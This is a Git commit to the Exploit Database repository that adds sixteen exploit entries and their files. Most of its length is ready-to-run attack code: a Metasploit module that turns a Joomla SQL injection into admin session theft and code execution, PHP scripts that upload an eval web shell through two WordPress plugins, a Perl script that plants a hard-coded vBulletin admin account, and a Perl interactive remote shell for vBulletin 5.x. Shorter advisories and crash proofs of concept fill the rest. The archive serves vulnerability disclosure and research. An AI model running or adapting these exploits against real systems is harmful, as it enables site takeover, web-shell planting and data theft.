DB: 2015-11-24

16 new exploits
This commit is contained in:
Offensive Security 2015-11-24 05:03:23 +00:00
parent 24fd1d1765
commit daf16b0803
17 changed files with 913 additions and 0 deletions

View file

@ -35045,8 +35045,24 @@ id,file,description,date,author,platform,type,port
38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-03,wantexz,php,webapps,0
38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0
38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0
38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-07,wantexz,php,webapps,0
38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) 'timestamp' Parameter Directory Traversal Vulnerability",2013-10-08,"Ding Yu-Chi",php,webapps,0
38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x '/install/upgrade.php' Security Bypass Vulnerability",2013-10-13,"Joshua Rogers",php,webapps,0
38786,platforms/php/webapps/38786.txt,"Ziteman CMS Login Page SQL Injection Vulnerability",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0
38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability 2",2015-11-23,"Francis Provencher",windows,dos,0
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza",php,webapps,80
38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash PoC",2015-11-23,"Antonio Z.",windows,dos,0
38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
38794,platforms/windows/dos/38794.txt,"Windows Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
38796,platforms/windows/dos/38796.txt,"Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80

Can't render this file because it is too large.

267
platforms/php/remote/38797.rb Executable file
View file

@ -0,0 +1,267 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Joomla Content History SQLi Remote Code Execution",
'Description' => %q{
This module exploits a SQL injection vulnerability found in Joomla versions
3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
component in the core of Joomla. Triggering the SQL injection makes it possible
to retrieve active Super User sessions. The cookie can be used to login to the
Joomla administrator backend. By creating a new template file containing our
payload, remote code execution is made possible.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Asaf Orpani', # Vulnerability discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2015-7857' ], # Admin session hijacking
[ 'CVE', '2015-7297' ], # SQLi
[ 'CVE', '2015-7857' ], # SQLi
[ 'CVE', '2015-7858' ], # SQLi
[ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
[ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 3.x <= 3.4.4', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 23 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
], self.class)
end
def check
# Request using a non-existing table
res = sqli(rand_text_alphanumeric(rand(10)+6))
if res && res.body =~ /`(.*)_ucm_history`/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def sqli( tableprefix )
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions.
sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'option' => 'com_contenthistory',
'view' => 'history',
'list[ordering]' => '',
'item_id' => '1',
'type_id' => '1',
'list[select]' => sql
}
})
return res
end
def exploit
# Request using a non-existing table first, to retrieve the table prefix
res = sqli(rand_text_alphanumeric(rand(10)+6))
if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
table_prefix = $1
print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
else
fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
end
# Retrieve the admin session using our retrieved table prefix
res = sqli("#{table_prefix}_")
if res && res.code == 500 && res.body =~ /Duplicate entry &#039;([a-z0-9]+)&#039; for key/
auth_cookie_part = $1[0...-1]
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
else
fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
end
# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php")
})
if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
cookie_begin = $1
print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
else
fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
end
# Modify cookie to authenticated admin
auth_cookie = cookie_begin
auth_cookie << "="
auth_cookie << auth_cookie_part
auth_cookie << ";"
# Authenticated session
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie
})
if res && res.code == 200 && res.body =~ /Administration - Control Panel/
print_status("#{peer} - Successfully authenticated as Administrator")
else
fail_with(Failure::Unknown, "#{peer} - Session failure")
end
# Retrieve template view
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'view' => 'templates'
}
})
# We try to retrieve and store the first template found
if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
template_id = $1
file_id = $2
else
fail_with(Failure::Unknown, "Unable to retrieve template")
end
filename = rand_text_alphanumeric(rand(10)+6)
# Create file
print_status("#{peer} - Creating file [ #{filename}.php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'task' => 'template.createFile',
'id' => template_id,
'file' => file_id,
},
'vars_post' => {
'type' => 'php',
'name' => filename
}
})
# Grab token
if res && res.code == 303 && res.headers['Location']
location = res.headers['Location']
print_status("#{peer} - Following redirect to [ #{location} ]")
res = send_request_cgi(
'uri' => location,
'method' => 'GET',
'cookie' => auth_cookie
)
# Retrieving template token
if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
end
if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
template_path = $1
print_status("#{peer} - Template path [ #{template_path} ] retrieved")
else
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
end
else
fail_with(Failure::Unknown, "#{peer} - Creating file failed")
end
filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
# Inject payload data into file
print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'view' => 'template',
'id' => template_id,
'file' => filename_base64,
},
'vars_post' => {
'jform[source]' => payload.encoded,
'task' => 'template.apply',
token => '1',
'jform[extension_id]' => template_id,
'jform[filename]' => "/#{filename}.php"
}
})
if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
else
fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
end
# Request payload
register_files_for_cleanup("#{filename}.php")
print_status("#{peer} - Executing payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
'cookie' => auth_cookie
})
end
end

62
platforms/php/webapps/38782.php Executable file
View file

@ -0,0 +1,62 @@
source: http://www.securityfocus.com/bid/62825/info
The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# seo-watcher ~ Exploit
# http://indonesiancoder.com/
echo <<<EOT
EOT;
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
-u http://target.com/ The full path to Joomla!
-f shell.php The name of the file to create.\n");
$url = $options['u'];
$file = $options['f'];
$shell = "{$url}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}";
$url = "{$url}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = "<?php eval(\$_GET['cmd']); ?>";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>

64
platforms/php/webapps/38783.php Executable file
View file

@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/62876/info
The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# woopra plugins ~ Exploit
# http://indonesiancoder.com/
#
echo <<<EOT
EOT;
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
-u http://target.com/ The full path to Joomla!
-f shell.php The name of the file to create.\n");
$url = $options['u'];
$file = $options['f'];
$shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
$url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = "<?php eval(\$_GET['cmd']); ?>";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') &&
@fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n
{$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}
?>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/62899/info
Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected.
http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim

142
platforms/php/webapps/38785.pl Executable file
View file

@ -0,0 +1,142 @@
source: http://www.securityfocus.com/bid/62909/info
vBulletin is prone to a security-bypass vulnerability.
Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions.
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading
# it only requires the customer number which can be extracted through the same script source code.
#
# Fix:
# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
#
# ===================================================
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Trying to get customer number ... hold on!
# [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "\n";
print "===================================================\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
print "--- Usage: perl $0 target\n\n";
exit; }
my $site = $ARGV[0];
##### Change these as needed #####
my $user = "MorXploit";
my $passwd = "m0rxpl017";
my $email = "dev%40null.com";
my $path = "/install/upgrade.php";
##################################
my $accept = "Accept: */*";
my $ct = "application/x-www-form-urlencoded";
my $port = "80";
system ('clear');
print "\n";
print "===================================================\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to get customer number ... hold on!\n";
print $sock "GET $path HTTP/1.1\n";
print $sock "Host: $site\n";
print $sock "$accept\n";
print $sock "Content-Type: $ct\n";
print $sock "Connection: Close\n\n";
my $gotcn;
while(my $cn = <$sock>) {
if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
$gotcn = $1;
}
}
if (!defined $gotcn) {
print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
}
else {
print "[+] Got $gotcn!\n";
}
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
&only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
a[confirmpassword]=$passwd&htmldata[email]=$email";
my $cl = length($xploit);
my $content = "Content-Length: $cl";
my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to MorXploit $site ... hold on!\n";
print $sock2 "POST $path HTTP/1.1\n";
print $sock2 "Host: $site\n";
print $sock2 "$accept\n";
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
print $sock2 "Content-Length: $cl\n";
print $sock2 "Content-Type: $ct\n";
print $sock2 "Connection: Close\n\n";
print $sock2 "$xploit\n\n";
while(my $result = <$sock2>){
if ($result =~ /Administrator account created/) {
print "[+] Admin account successfully injected!\n";
print "[+] Admin: $user\n";
print "[+] Pass: $passwd\n";
exit;
}
}
print "[-] Failed, something went wrong\n";
exit;

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/62949/info
Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/admincss/default.asp

47
platforms/php/webapps/38790.pl Executable file
View file

@ -0,0 +1,47 @@
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
$source=$response->decoded_content;
if (($source =~ m/4276158464/i))
{
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
$user=$response->decoded_content;
chomp($user);
print "\n Target Vulnerable ;)\n";
while($cmd=="exit")
{
print "\n\n$user\$ ";
$cmd=<STDIN>;
chomp($cmd);
if($cmd =~ m/exit/i){exit 0;}
$len=length($cmd);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
print "\n".$response->decoded_content;
}
}else{print "\ntarget is not Vulnerable\n\n"}

67
platforms/windows/dos/38787.txt Executable file
View file

@ -0,0 +1,67 @@
#####################################################################################
Application: Acrobat Reader DC
Platforms: Windows
Versions: 15.008.20082.15957
CVE: CVE-2015-7622
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).[14]
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. Thefreeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files.[15] Thecommercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content managementand file hosting services.
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
============================
2) Report Timeline
============================
2015-08-09: Francis Provencher of COSIG found the issue;
2015-08-11: Francis Provencher of COSIG report vulnerability to PSIRT;
2015-10-13: Adobe release a patch (APSB15-24)
#####################################################################################
============================
3) Technical details
============================
An error in the the PDF parser, could lead to a memory corruption when processing a crafted PDF with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38787.zip
###############################################################################

63
platforms/windows/dos/38788.txt Executable file
View file

@ -0,0 +1,63 @@
#####################################################################################
Application: Oracle Outside In
Platforms: Windows
Versions: 8.5.2
CVE: CVE-2015-4877
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-06-09: Francis Provencher of COSIG found the issue;
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
2015-10-18: Oracle release a patch for this issue;
#####################################################################################
============================
3) Technical details
============================
An heap memory corruption occured when Outside In decode (DCTDecode) a PDF with a JPEG that have an invalid “Heigth” value.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-002.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38788.zip
###############################################################################

63
platforms/windows/dos/38789.txt Executable file
View file

@ -0,0 +1,63 @@
#####################################################################################
Application: Oracle Outside In
Platforms: Windows
Versions: 8.5.2
CVE: CVE-2015-4878
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of over 500 unstructured file formats. From the latest office suites, such as Microsoft Office 2007, to specialty formats and legacy files, Outside In Technology provides software developers with the tools to transform unstructured files into controllable information.
(http://www.oracle.com/us/technologies/embedded/025613.htm)
#####################################################################################
============================
2) Report Timeline
============================
2015-06-09: Francis Provencher of COSIG found the issue;
2015-06-11: Francis Provencher of COSIG report vulnerability to Oracle SA;
2015-10-18: Oracle release a patch for this issue;
#####################################################################################
============================
3) Technical details
============================
A Use-After-Free memory corruption occured when Outside In decode (JBIG2Decode) a stream with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-003.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38789.zip
###############################################################################

19
platforms/windows/dos/38791.rb Executable file
View file

@ -0,0 +1,19 @@
# Exploit Title: Audacious 3.7 ID3 Local Crash PoC
# Date: 11-20-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://audacious-media-player.org/
# Software Link: http://audacious-media-player.org/download | http://distfiles.audacious-media-player.org/audacious-3.7-win32.zip
# Version: 3.7
# Tested on: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
# Comment: Issue was reported: http://redmine.audacious-media-player.org/issues/595
require 'fileutils'
require 'mp3info'
evil = 'A' * 1048576
FileUtils.cp 'Test_Case.mp3', 'Test_Case_PoC.mp3'
Mp3Info.open('Test_Case_PoC.mp3') do |mp3|
mp3.tag.artist = evil
end

View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=516
The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in an ioctl handler. Enabling special on ndis.sys netio.sys and ntoskrnl helps to track down the issue, however it will crashes due to a bad pool header without special pool as well.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38793.zip

10
platforms/windows/dos/38794.txt Executable file
View file

@ -0,0 +1,10 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=510
The attached poc crashes 32-bit Windows 7 with a screen resolution of 1024x768 and 32bit color depth. The crash occurs during a memmove opperation while copying the cursor content from unmapped memory. This could potentially be used by an attacker to leak kernel memory.
When reproducing this issue in VMWare, it is necessary to remove VMWare tools. In QEMU the issue reproduces reliably.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38794.zip

View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=509
The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32k.sys due to a use-after-free condition. The bug appears to be a race condition between two threads and multiple runs on the PoC might be required to trigger the bug. This is more reliable on systems with multiple cores.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38795.zip

View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=505
The attached testcase triggers a use-after-free condition in win32k. The attached debugger output was triggered on Windows 7 with Special Pool enabled on win32k.sys.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38796.zip

View file

@ -0,0 +1,53 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=515
NVIDIA: Stereoscopic 3D Driver Service Arbitrary Run Key Creation
Platform: Windows, NVIDIA Service Version 7.17.13.5382
Class: Elevation of Privilege, Remote Code Execution
Summary:
The 3D Vision service nvSCPAPISvr.exe installed as part of typical driver installations runs at Local System and has an insecure named pipe server. One of the commands in the server can be used to set an Explorer Run key for the system which would allow a user to get code executing in the session of any other user who logs on to the same machine leading to elevation of privilege. In Windows Domain environments it would also be possible to exploit the vulnerability between machines if the attacker has access to a valid user account on one domain joined machine.
Description:
The NVIDIA Stereoscopic 3D Driver Service exposes the named pipe “stereosvrpipe” which implements a simple command response service. One of the commands (number 2) will write an arbitrary value to a fixed set of two registry keys, one which is specific to NVIDIA (no effort has been made to determine if this could be abused) and also the HKEY_LOCAL_MACHINE explorer Run key. This Run key is inspected when a new copy of the Windows Explorer shell is started, any values are treated as command lines to execute. Therefore any user on the system can create an arbitrary run key entry and get their own commands to execute in the security context of any other user (such as an administrator) who logs into the system to interact with the desktop.
The named pipe is not locked down to prevent abuse, in fact its given a NULL DACL which means that any user can open the device, although it cant be exploited from typical application sandboxes such as Chrome or IE. When the pipe is created no attempt is made to prevent remote access to the pipe (by passing the PIPE_REJECT_REMOTE_CLIENTS) flag. This means that the service can also be exposed to external systems, assuming the client has valid credentials (or is running within a session which can use Integrated Authentication). This is probably most dangerous in a Windows Domain Environment.
Finally the service has a potentially memory corruption issue when handling the registry key path. When reading a string from the named pipe the code doesnt ensure the string is NUL terminated. Instead its passed to a function to verify that the path is prefixed with one of the valid registry keys. The code for this check is roughly:
BOOLEAN is_string_prefixed(char *read_str, char *prefix)
{
int ret = FALSE;
int prefix_len = strlen(prefix);
if ( read_str && strlen(read_str) >= prefix_len )
{
char old_char = read_str[prefix_len];
read_str[prefix_len] = 0;
if ( !_strnicmp(read_str, prefix, prefix_len) )
ret = TRUE;
read_str[prefix_len] = old_char;
}
return ret;
}
